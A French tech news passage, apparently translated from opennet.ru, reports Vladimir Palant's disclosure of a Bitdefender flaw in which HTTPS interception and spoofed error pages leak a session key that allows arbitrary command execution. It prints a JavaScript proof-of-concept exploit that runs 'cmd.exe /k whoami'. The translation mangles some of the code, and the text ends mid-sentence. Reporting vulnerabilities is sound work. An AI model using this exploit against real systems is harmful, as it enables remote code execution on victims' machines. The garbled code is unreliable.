Vladimir Palant, créateur d'Adblock Plus,
La cause du problème est que l'antivirus Bitdefender effectue une interception locale du trafic HTTPS en remplaçant le certificat TLS d'origine du site. Un certificat racine supplémentaire est installé sur le système du client, ce qui permet de masquer le fonctionnement du système d'inspection du trafic utilisé. L'antivirus s'insère dans le trafic protégé et insère son propre code JavaScript dans certaines pages pour implémenter la fonction Safe Search, et en cas de problèmes avec le certificat de connexion sécurisée, il remplace la page d'erreur renvoyée par la sienne. Étant donné que la nouvelle page d'erreur est servie au nom du serveur ouvert, les autres pages de ce serveur ont un accès complet au contenu inséré par Bitdefender.
Lors de l'ouverture d'un site contrôlé par un attaquant, ce site peut envoyer une XMLHttpRequest et feindre des problèmes avec le certificat HTTPS en répondant, ce qui entraînera le retour d'une page d'erreur usurpée par Bitdefender. Puisque la page d'erreur est ouverte dans le contexte du domaine de l'attaquant, celui-ci peut lire le contenu de la page usurpée avec les paramètres Bitdefender. La page fournie par Bitdefender contient également une clé de session qui vous permet d'utiliser l'API interne de Bitdefender pour lancer une session de navigateur Safepay distincte, en spécifiant des indicateurs de ligne de commande arbitraires, et de lancer toutes les commandes système à l'aide du « --utility-cmd-prefix ». drapeau. Un exemple d'exploit (param1 et param2 sont des valeurs obtenues à partir de la page d'erreur) :
var requête = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Rappelons qu'une étude menée en 2017
Seuls 11 des 26 produits fournissaient les suites de chiffrement actuelles. 5 systèmes n'ont pas vérifié les certificats (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Les produits Kaspersky Internet Security et Total Security ont fait l'objet d'attaques
Source: opennet.ru